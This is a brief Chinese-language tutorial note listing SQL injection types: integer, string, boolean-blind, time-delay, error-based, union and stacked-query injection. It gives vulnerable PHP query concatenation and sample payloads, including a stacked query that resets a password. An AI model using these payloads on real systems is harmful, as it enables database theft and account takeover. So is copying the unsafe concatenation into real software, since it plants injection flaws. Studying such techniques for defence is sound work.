基于整型的注入:
url:http://localhost/?id=12 拼接sql:$sql = "select * from user where id = {$_GET['id']}"; sql执行语句:select * from user where id = 12 基于整型的sql注入即存在sql注入漏洞的url参数为整数类型,sql语句中参数值两边没有引号。
基于字符型的注入:
url:http://localhost/?name=jackWan 拼接sql:$sql = "select * from user where name = '{$_GET['name']}'"; sql执行语句:select * from user where name = 'jackWan' sql语句中参数值两边带有引号,攻击向量就要闭合该引号(?name=' or 1=1)。
布尔型注入:
length()返回字符串的存储长度 char_length()返回字符串的字符个数 left(str, len), right(str, len) 返回最左(右)边的len长度的子串 database() 返回当前数据库名 判断当前数据库名的前两个字符是否比'na'大(比较ascii码): select * from user where id = 1 and left(database(),2) > 'na';
时间延迟注入:
if(condition,A,B)若condition为真时返回A,否则返回B 当前数据库名的长度若为4则休眠10秒: select * from user where id = 1 and if(char_length(database())=4,sleep(10),1)
报错型注入:
http://www.cnblogs.com/natian-ws/p/7204806.html
联合查询注入:
select * from user where id = 1 union select * from user_info
多语句查询注入:
select * from user where id = 1; update user set password = '123456' where id = 1